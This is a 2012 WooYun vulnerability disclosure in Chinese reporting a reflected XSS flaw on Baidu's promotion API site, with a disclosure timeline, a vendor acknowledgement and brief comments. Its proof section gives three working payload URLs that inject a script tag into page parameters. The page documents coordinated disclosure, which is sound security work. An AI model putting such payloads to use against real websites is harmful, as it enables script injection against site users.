当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08714

漏洞标题:百度推广API XSS

相关厂商:百度

漏洞作者: leaf

提交时间:2012-06-24 17:10

修复时间:2012-08-08 17:10

公开时间:2012-08-08 17:10

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-24: 细节已通知厂商并且等待厂商处理中
2012-06-25: 厂商已经确认,细节仅向厂商公开
2012-07-05: 细节向核心白帽子及相关领域专家公开
2012-07-15: 细节向普通白帽子公开
2012-07-25: 细节向实习白帽子公开
2012-08-08: 细节向公众公开

简要描述:

百度推广API XSS!

详细说明:

http://apihome.baidu.com/index.php
该链接的几个参数没有对输入进行必要的过滤或转义,导致XSS!

漏洞证明:

http://apihome.baidu.com/index.php?action=newslist&lang=zh_cn&controller=news&ntype=news"></a><ScRipt>confirm(/wooyun/);</ScRipt>&module=front


http://apihome.baidu.com/index.php?lang=zh_cn&castk=LTE%3D"></a><ScRipt>confirm(/wooyn/);</ScRipt>


http://apihome.baidu.com/index.php?lang=zh_cn&ntype=news&nid=30"></a><ScRipt>confirm(/wooyun/);</ScRipt>&controller=news&module=front&action=newsdetail


...

修复方案:

进行必要的过滤或转义!

版权声明:转载请注明来源 leaf@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2012-06-25 18:00

厂商回复:

感谢提交,我们会尽快修复

最新状态:

暂无


漏洞评价:

评论

  1. 2012-06-24 18:06 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    刷屏了。。。

  2. 2012-06-24 18:22 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @imlonghao 呵呵!刷不上啊!至少得连提6个...不然难以霸屏啊!